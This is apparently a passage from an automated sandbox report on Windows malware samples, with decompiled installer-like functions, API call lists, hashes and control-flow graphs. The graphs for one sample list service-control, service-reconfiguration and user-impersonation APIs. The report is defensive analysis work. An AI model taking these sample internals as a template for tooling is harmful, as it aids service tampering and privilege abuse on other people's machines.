                                                                                                                                                                                                      • Instruction ID: 4123b9f6ca4fe3ad2f5d1ae48358db846ea180c95c28a88d7487e7a68fbf2e35
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 881693874657ae10f59829bcb414264af6cd56285d57ffea26db584662d0fe76
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0221D271A00218ABDB20DF65DC85FEB777CEB55314F1042A9F595A3280DFB06D858FA4
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A63680(void* __ecx) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				struct tagMSG _v36;
                                                                                                                                                                                                      				int _t8;
                                                                                                                                                                                                      				struct HWND__* _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_v8 = __ecx;
                                                                                                                                                                                                      				_t16 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                      					if(_t8 == 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							if(_v36.message != 0x12) {
                                                                                                                                                                                                      								DispatchMessageA( &_v36);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t16 = 1;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                      						} while (_t8 != 0);
                                                                                                                                                                                                      						if(_t16 == 0) {
                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					break;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t8;
                                                                                                                                                                                                      			}







                                                                                                                                                                                                      0x00a6368c
                                                                                                                                                                                                      0x00a6368f
                                                                                                                                                                                                      0x00a63691
                                                                                                                                                                                                      0x00a6369f
                                                                                                                                                                                                      0x00a636a7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a636ba
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a636bc
                                                                                                                                                                                                      0x00a636bc
                                                                                                                                                                                                      0x00a636c0
                                                                                                                                                                                                      0x00a636cb
                                                                                                                                                                                                      0x00a636c2
                                                                                                                                                                                                      0x00a636c4
                                                                                                                                                                                                      0x00a636c4
                                                                                                                                                                                                      0x00a636da
                                                                                                                                                                                                      0x00a636e0
                                                                                                                                                                                                      0x00a636e6
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a636e6
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a636ba
                                                                                                                                                                                                      0x00a636ed

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A6369F
                                                                                                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A636B2
                                                                                                                                                                                                      • DispatchMessageA.USER32(?), ref: 00A636CB
                                                                                                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A636DA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2776232527-0
                                                                                                                                                                                                      • Opcode ID: 445923c8561c2119ce2cc0b7e23f1b37ae6d98f3e08cbcabdf41f17296796c0e
                                                                                                                                                                                                      • Instruction ID: aa34f0ffeae6ffe9c424048093cb84eca718f6c0c6ca98c26cd19ac5e92f5db7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 445923c8561c2119ce2cc0b7e23f1b37ae6d98f3e08cbcabdf41f17296796c0e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F01677790025577DF308BE69C48EEB76BCEBC6F10F140219F915F2180D5A5D646CA61
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                                                                      			E00A66517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                      				struct HRSRC__* _t6;
                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                      				struct HINSTANCE__* _t23;
                                                                                                                                                                                                      				int _t24;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t23 =  *0xa69a3c; // 0xa60000
                                                                                                                                                                                                      				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                      				if(_t6 == 0) {
                                                                                                                                                                                                      					L6:
                                                                                                                                                                                                      					E00A644B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					_t24 = _a16;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                      					if(_t21 == 0) {
                                                                                                                                                                                                      						goto L6;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(_a12 != 0) {
                                                                                                                                                                                                      							_push(_a12);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_push(0);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                      						FreeResource(_t21);
                                                                                                                                                                                                      						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                      							goto L6;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t24;
                                                                                                                                                                                                      			}







                                                                                                                                                                                                      0x00a6651f
                                                                                                                                                                                                      0x00a6652a
                                                                                                                                                                                                      0x00a66534
                                                                                                                                                                                                      0x00a6656b
                                                                                                                                                                                                      0x00a66577
                                                                                                                                                                                                      0x00a6657c
                                                                                                                                                                                                      0x00a66536
                                                                                                                                                                                                      0x00a6653e
                                                                                                                                                                                                      0x00a66542
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a66544
                                                                                                                                                                                                      0x00a66547
                                                                                                                                                                                                      0x00a6654c
                                                                                                                                                                                                      0x00a66549
                                                                                                                                                                                                      0x00a66549
                                                                                                                                                                                                      0x00a66549
                                                                                                                                                                                                      0x00a6655e
                                                                                                                                                                                                      0x00a66560
                                                                                                                                                                                                      0x00a66569
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a66569
                                                                                                                                                                                                      0x00a66542
                                                                                                                                                                                                      0x00a66587

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00A60000,000007D6,00000005), ref: 00A6652A
                                                                                                                                                                                                      • LoadResource.KERNEL32(00A60000,00000000,?,?,00A62EE8,00000000,00A619E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A66538
                                                                                                                                                                                                      • DialogBoxIndirectParamA.USER32(00A60000,00000000,00000547,00A619E0,00000000), ref: 00A66557
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,00A62EE8,00000000,00A619E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A66560
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1214682469-0
                                                                                                                                                                                                      • Opcode ID: 8bc55f8e874c1c31f0d7ca9787c15c8612d57fd473a90122b35701f40ec35690
                                                                                                                                                                                                      • Instruction ID: bdd58da54538bbe006e6afe509ce82151eb4031c6e6f0fe157af90b56cb10583
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8bc55f8e874c1c31f0d7ca9787c15c8612d57fd473a90122b35701f40ec35690
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE01F972100615BBDB10AFE99C49DBB7A7CEBD9761F010125FE16E3190DBB1CD11CAA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 72%
                                                                                                                                                                                                      			E00A665E8(char* __ecx) {
                                                                                                                                                                                                      				char _t3;
                                                                                                                                                                                                      				char _t10;
                                                                                                                                                                                                      				char* _t12;
                                                                                                                                                                                                      				char* _t14;
                                                                                                                                                                                                      				char* _t15;
                                                                                                                                                                                                      				CHAR* _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t12 = __ecx;
                                                                                                                                                                                                      				_t15 = __ecx;
                                                                                                                                                                                                      				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                      				_t10 = 0;
                                                                                                                                                                                                      				do {
                                                                                                                                                                                                      					_t3 =  *_t12;
                                                                                                                                                                                                      					_t12 =  &(_t12[1]);
                                                                                                                                                                                                      				} while (_t3 != 0);
                                                                                                                                                                                                      				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                      					if(_t16 <= _t15) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if( *_t16 == 0x5c) {
                                                                                                                                                                                                      						L7:
                                                                                                                                                                                                      						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                      							_t16 = CharNextA(_t16);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *_t16 = _t10;
                                                                                                                                                                                                      						_t10 = 1;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_push(_t16);
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					return _t10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if( *_t16 == 0x5c) {
                                                                                                                                                                                                      					goto L7;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L11;
                                                                                                                                                                                                      			}









                                                                                                                                                                                                      0x00a665e8
                                                                                                                                                                                                      0x00a665ed
                                                                                                                                                                                                      0x00a665ef
                                                                                                                                                                                                      0x00a665f2
                                                                                                                                                                                                      0x00a665f4
                                                                                                                                                                                                      0x00a665f4
                                                                                                                                                                                                      0x00a665f6
                                                                                                                                                                                                      0x00a665f7
                                                                                                                                                                                                      0x00a66608
                                                                                                                                                                                                      0x00a66611
                                                                                                                                                                                                      0x00a66618
                                                                                                                                                                                                      0x00a6661c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6660e
                                                                                                                                                                                                      0x00a66623
                                                                                                                                                                                                      0x00a66625
                                                                                                                                                                                                      0x00a6663b
                                                                                                                                                                                                      0x00a6663b
                                                                                                                                                                                                      0x00a6663d
                                                                                                                                                                                                      0x00a66641
                                                                                                                                                                                                      0x00a66610
                                                                                                                                                                                                      0x00a66610
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a66610
                                                                                                                                                                                                      0x00a66644
                                                                                                                                                                                                      0x00a66647
                                                                                                                                                                                                      0x00a66647
                                                                                                                                                                                                      0x00a66621
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00A62B33), ref: 00A66602
                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000), ref: 00A66612
                                                                                                                                                                                                      • CharPrevA.USER32(?,00000000), ref: 00A66629
                                                                                                                                                                                                      • CharNextA.USER32(00000000), ref: 00A66635
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$Prev$Next
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3260447230-0
                                                                                                                                                                                                      • Opcode ID: a0240de5cea298690bcfeb701b0081d1d1b4eab23ae9d37aa514310825652345
                                                                                                                                                                                                      • Instruction ID: 8c852389fc8d52808e63efb4fdfe313c39cb75bbb47484c2ada6f62851bbf737
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0240de5cea298690bcfeb701b0081d1d1b4eab23ae9d37aa514310825652345
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3EF02D350041906ED7365B68EC888B7BFBCDF97354B19026FE491A2001D6550D078A61
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A669B0() {
                                                                                                                                                                                                      				intOrPtr* _t4;
                                                                                                                                                                                                      				intOrPtr* _t5;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				intOrPtr _t11;
                                                                                                                                                                                                      				intOrPtr _t12;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				 *0xa681f8 = E00A66C70();
                                                                                                                                                                                                      				__set_app_type(E00A66FBE(2));
                                                                                                                                                                                                      				 *0xa688a4 =  *0xa688a4 | 0xffffffff;
                                                                                                                                                                                                      				 *0xa688a8 =  *0xa688a8 | 0xffffffff;
                                                                                                                                                                                                      				_t4 = __p__fmode();
                                                                                                                                                                                                      				_t11 =  *0xa68528; // 0x0
                                                                                                                                                                                                      				 *_t4 = _t11;
                                                                                                                                                                                                      				_t5 = __p__commode();
                                                                                                                                                                                                      				_t12 =  *0xa6851c; // 0x0
                                                                                                                                                                                                      				 *_t5 = _t12;
                                                                                                                                                                                                      				_t6 = E00A67000();
                                                                                                                                                                                                      				if( *0xa68000 == 0) {
                                                                                                                                                                                                      					__setusermatherr(E00A67000);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E00A671EF(_t6);
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      0x00a669b7
                                                                                                                                                                                                      0x00a669c2
                                                                                                                                                                                                      0x00a669c8
                                                                                                                                                                                                      0x00a669cf
                                                                                                                                                                                                      0x00a669d8
                                                                                                                                                                                                      0x00a669de
                                                                                                                                                                                                      0x00a669e4
                                                                                                                                                                                                      0x00a669e6
                                                                                                                                                                                                      0x00a669ec
                                                                                                                                                                                                      0x00a669f2
                                                                                                                                                                                                      0x00a669f4
                                                                                                                                                                                                      0x00a66a00
                                                                                                                                                                                                      0x00a66a07
                                                                                                                                                                                                      0x00a66a0d
                                                                                                                                                                                                      0x00a66a0e
                                                                                                                                                                                                      0x00a66a15

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00A66FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00A66FC5
                                                                                                                                                                                                      • __set_app_type.MSVCRT ref: 00A669C2
                                                                                                                                                                                                      • __p__fmode.MSVCRT ref: 00A669D8
                                                                                                                                                                                                      • __p__commode.MSVCRT ref: 00A669E6
                                                                                                                                                                                                      • __setusermatherr.MSVCRT ref: 00A66A07
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1632413811-0
                                                                                                                                                                                                      • Opcode ID: 4bd6a1fee66f377af9c3cbb3777101efc8ea47d8222e7421ee09477bab9b17fd
                                                                                                                                                                                                      • Instruction ID: 840393ea448e18eb2dc733fae152fc29a3c13b24dcc38316c164d823aa4e4ca1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4bd6a1fee66f377af9c3cbb3777101efc8ea47d8222e7421ee09477bab9b17fd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4F01CB01983018FC715EFB0EE1A6583BB5FB15335B110719E462962F0CFBE8542CE11
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Callgraph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      • Opacity -> Relevance
                                                                                                                                                                                                      • Disassembly available
                                                                                                                                                                                                      callgraph 0 Function_00007FF9A5DC0E02 1 Function_00007FF9A5DC1188 4 Function_00007FF9A5DC0108 1->4 14 Function_00007FF9A5DC0118 1->14 21 Function_00007FF9A5DC0710 1->21 27 Function_00007FF9A5DC0128 1->27 2 Function_00007FF9A5DC0148 3 Function_00007FF9A5DC01C8 5 Function_00007FF9A5DC0188 6 Function_00007FF9A5DC223A 7 Function_00007FF9A5DC0A7E 7->2 13 Function_00007FF9A5DC0158 7->13 7->14 26 Function_00007FF9A5DC0168 7->26 8 Function_00007FF9A5DC077D 39 Function_00007FF9A5DC0A2E 8->39 9 Function_00007FF9A5DC0294 10 Function_00007FF9A5DC0E52 36 Function_00007FF9A5DC102C 10->36 11 Function_00007FF9A5DC01D8 12 Function_00007FF9A5DC0198 15 Function_00007FF9A5DC000C 16 Function_00007FF9A5DC108A 17 Function_00007FF9A5DC190A 17->2 17->5 17->13 17->14 35 Function_00007FF9A5DC0178 17->35 18 Function_00007FF9A5DC214A 18->6 19 Function_00007FF9A5DC06CA 20 Function_00007FF9A5DC2049 34 Function_00007FF9A5DC0138 21->34 22 Function_00007FF9A5DC02A4 22->3 22->11 22->12 24 Function_00007FF9A5DC01E8 22->24 25 Function_00007FF9A5DC01A8 22->25 33 Function_00007FF9A5DC01B8 22->33 23 Function_00007FF9A5DC1262 23->4 23->14 23->27 28 Function_00007FF9A5DC019E 29 Function_00007FF9A5DC1A1D 29->20 30 Function_00007FF9A5DC0C34 30->0 31 Function_00007FF9A5DC0234 31->3 31->11 31->12 31->24 31->25 31->33 32 Function_00007FF9A5DC2273 37 Function_00007FF9A5DC0070 38 Function_00007FF9A5DC016E 40 Function_00007FF9A5DC06ED 40->34 41 Function_00007FF9A5DC0B2D

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 0 7ff9a5dc1a1d-7ff9a5dc1a25 1 7ff9a5dc1a28-7ff9a5dc1ad9 ControlService 0->1 2 7ff9a5dc1a27 0->2 6 7ff9a5dc1ae1-7ff9a5dc1b17 1->6 7 7ff9a5dc1adb 1->7 2->1 8 7ff9a5dc1b22-7ff9a5dc1bd8 6->8 9 7ff9a5dc1b19-7ff9a5dc1b21 6->9 7->6 13 7ff9a5dc1c36-7ff9a5dc1c68 8->13 14 7ff9a5dc1bda-7ff9a5dc1be9 8->14 9->8 21 7ff9a5dc1cc7-7ff9a5dc1d00 13->21 22 7ff9a5dc1c6a-7ff9a5dc1c7a 13->22 14->13 15 7ff9a5dc1beb-7ff9a5dc1bee 14->15 16 7ff9a5dc1c28-7ff9a5dc1c30 15->16 17 7ff9a5dc1bf0-7ff9a5dc1c03 15->17 16->13 19 7ff9a5dc1c07-7ff9a5dc1c1a 17->19 20 7ff9a5dc1c05 17->20 19->19 23 7ff9a5dc1c1c-7ff9a5dc1c24 19->23 20->19 28 7ff9a5dc1d02-7ff9a5dc1d11 21->28 29 7ff9a5dc1d5e-7ff9a5dc1d97 21->29 22->21 24 7ff9a5dc1c7c-7ff9a5dc1c7f 22->24 23->16 26 7ff9a5dc1c81-7ff9a5dc1c94 24->26 27 7ff9a5dc1cb9-7ff9a5dc1cc1 24->27 30 7ff9a5dc1c98-7ff9a5dc1cab 26->30 31 7ff9a5dc1c96 26->31 27->21 28->29 32 7ff9a5dc1d13-7ff9a5dc1d16 28->32 39 7ff9a5dc1df6-7ff9a5dc1e2f 29->39 40 7ff9a5dc1d99-7ff9a5dc1da9 29->40 30->30 33 7ff9a5dc1cad-7ff9a5dc1cb5 30->33 31->30 34 7ff9a5dc1d18-7ff9a5dc1d2b 32->34 35 7ff9a5dc1d50-7ff9a5dc1d58 32->35 33->27 37 7ff9a5dc1d2f-7ff9a5dc1d42 34->37 38 7ff9a5dc1d2d 34->38 35->29 37->37 41 7ff9a5dc1d44-7ff9a5dc1d4c 37->41 38->37 48 7ff9a5dc1e31-7ff9a5dc1e41 39->48 49 7ff9a5dc1e8e-7ff9a5dc1ec7 39->49 40->39 42 7ff9a5dc1dab-7ff9a5dc1dae 40->42 41->35 44 7ff9a5dc1de8-7ff9a5dc1df0 42->44 45 7ff9a5dc1db0-7ff9a5dc1dc3 42->45 44->39 46 7ff9a5dc1dc7-7ff9a5dc1dda 45->46 47 7ff9a5dc1dc5 45->47 46->46 50 7ff9a5dc1ddc-7ff9a5dc1de4 46->50 47->46 48->49 51 7ff9a5dc1e43-7ff9a5dc1e46 48->51 55 7ff9a5dc1f26-7ff9a5dc1fe2 ChangeServiceConfigA 49->55 56 7ff9a5dc1ec9-7ff9a5dc1ed9 49->56 50->44 53 7ff9a5dc1e48-7ff9a5dc1e5b 51->53 54 7ff9a5dc1e80-7ff9a5dc1e88 51->54 57 7ff9a5dc1e5f-7ff9a5dc1e72 53->57 58 7ff9a5dc1e5d 53->58 54->49 66 7ff9a5dc1fe4 55->66 67 7ff9a5dc1fea-7ff9a5dc1ffc call 7ff9a5dc2049 55->67 56->55 59 7ff9a5dc1edb-7ff9a5dc1ede 56->59 57->57 60 7ff9a5dc1e74-7ff9a5dc1e7c 57->60 58->57 61 7ff9a5dc1f18-7ff9a5dc1f20 59->61 62 7ff9a5dc1ee0-7ff9a5dc1ef3 59->62 60->54 61->55 64 7ff9a5dc1ef7-7ff9a5dc1f0a 62->64 65 7ff9a5dc1ef5 62->65 64->64 68 7ff9a5dc1f0c-7ff9a5dc1f14 64->68 65->64 66->67 70 7ff9a5dc2001-7ff9a5dc202d 67->70 68->61 71 7ff9a5dc2034-7ff9a5dc2047 70->71 72 7ff9a5dc202f 70->72 72->71
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.344051468.00007FF9A5DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5DC0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7ff9a5dc0000_iGb20db.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Service$ChangeConfigControl
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1778205439-0
                                                                                                                                                                                                      • Opcode ID: 996017712eb69f27c480e3afef94288e3b1dc58b6966fecae74c1b18da540475
                                                                                                                                                                                                      • Instruction ID: e1e4f0861e58d10ae6c4ce1ef86e16eb6aaa4c85493bf3efe847b29add94ce18
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 996017712eb69f27c480e3afef94288e3b1dc58b6966fecae74c1b18da540475
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7120830A18A4D4FDB68DF68D8467F977E0FB55710F00427EE89EC3291DB74A9858B82
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.344051468.00007FF9A5DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5DC0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7ff9a5dc0000_iGb20db.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: NameUser
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2645101109-0
                                                                                                                                                                                                      • Opcode ID: 675ff21a098e1e01b26e31ec85d7495383a378355dfcd5d1006c4eac5c1e739a
                                                                                                                                                                                                      • Instruction ID: cc846213abe6ac3196e7350620092567843448d33e5bf9c993c0eca765413595
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 675ff21a098e1e01b26e31ec85d7495383a378355dfcd5d1006c4eac5c1e739a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C917130618A4D8FEBA8EF28D8557E977E1FF59300F00813AD88DC7292DB74A545CB82
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.344051468.00007FF9A5DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5DC0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_7ff9a5dc0000_iGb20db.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ImpersonateLoggedUser
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2216092060-0
                                                                                                                                                                                                      • Opcode ID: 11cebabd2b2586501dbc67490ac2a5b20574ff20965171b81160d87ccd3c23ad
                                                                                                                                                                                                      • Instruction ID: 8312a5f08f67357e649ea0db10896903be1d303633040649807c3c2596a6f934
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11cebabd2b2586501dbc67490ac2a5b20574ff20965171b81160d87ccd3c23ad
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67A1F231A0DB884FDB59DBB898556F97BE1EF57311F0442BFD089C3293CA686809CB52
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
